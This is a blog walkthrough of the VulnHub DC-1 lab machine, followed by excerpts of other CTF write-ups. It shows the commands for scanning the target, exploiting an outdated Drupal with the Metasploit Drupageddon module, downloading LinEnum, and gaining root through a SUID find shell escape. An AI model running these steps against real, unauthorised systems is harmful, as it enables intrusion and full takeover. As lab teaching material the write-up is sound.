DC-1 Walkthrough

Introduction

Today we're going to do a boot2root pentest walkthrough of the DC-1 machine created by DCAU7 and hosted at https://www.vulnhub.com/entry/dc-1,292/ .

For this pentest walkthrough we'll be using two virtual machines, a Kali Linux machine as our attacking system, and the DC-1 machine as our target system.

Locating the Target

After booting up both machines, the first thing to do is locate the target system on our network, so we run netdiscover from our attacking system.

netdiscover -r 10.0.2.0/24


Looks like 10.0.2.20 is our target.

Scanning and Enumeration

We start our scans with nmap, and scan for open TCP and UDP ports on the target system.

nmap -T4 -p- 10.0.2.20 ; nmap -T4 -sU -F 10.0.2.20


Four ports open.  We'll run nmap again against those four ports to get more info.

nmap -T4 -A -p22,80,111,58224 10.0.2.20


There's a lot of potential in these robot.txt entries.  We might look through them later.

We get a big lead from scans made by the Nessus vulnerability scanner.


It seems that the Drupal CMF (content management framework) is a potential target because the installed version is outdated.

Finding a Way In


With a bit of searching, we find this entry on exploit-db.com .  It turns out that this exploit is also featured as a Metasploit module, so we start out Metasploit console and navigate to the module's directory.

msfconsole

use /multi/http/drupal_drupageddon

options


Looks like the only option we have to set on this module is the remote host.

set rhosts 10.0.2.20

run


The exploit worked, and we now have a Meterpreter shell on the target system.

Privilege Escalation

Next, we'll drop from our Meterpreter shell to a regular remote shell.  Then, we'll upgrade from our non-TTY shell to a more useful one using a Python one-liner command.

shell

python -c 'import pty; pty.spawn("/bin/bash")'


We want to use a script to help us enumerate the target system now that we're in, but we need to download it to our target system first.

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEum.sh

Before we can run our enumeration script, we need to give executable permissions to the file.

chmod +x LinEnum.sh

Now we'll run script with the -t switch, so give more thorough results.

./LinEnum.sh -t

After looking through the output of the script, we find something interesting.


The find command as a SUID binary is a potential tool for us to use for privilege escalation.  If the find command is a SUID binary, the following command should open a new shell for us with root privileges.

find . -exec /bin/sh \; -quit


It worked, and we have a root shell.  Now to cat out the system's flag file and we'll be done.

cd /root

ls

cat thefinalflag.txt


Summary

After our initial scans, we found that the target's Drupal app was outdated and vulnerable to exploit, so we used a Metasploit module to gain a remote shell on the target system.  From there, we used a script to enumerate the system and found that a vulnerable command was set as a SUID binary, so we exploited it to gain root access and capture the system's flag.

Finish























Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - XSS - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the XSS room hosted at https://tryhackme.com/room/ xss . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed XSS vulnerable web client as the the victim machine. Task 1 - Introduction Questions: Read the introduction. No answer needed Task 2 - Deploy your XSS Playground Questions Deploy the machine and navigate to http://<ip> No answer needed Task 3 - Stored XSS Questions The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine. No answer needed Add a comment and see if you can insert some of your own HTML. Doing so will reveal the answer to this question. Register for the web-app with the following parameters Username: test Password: test Click the Register button  Click the “hamburger menu” button Click the ...
Read more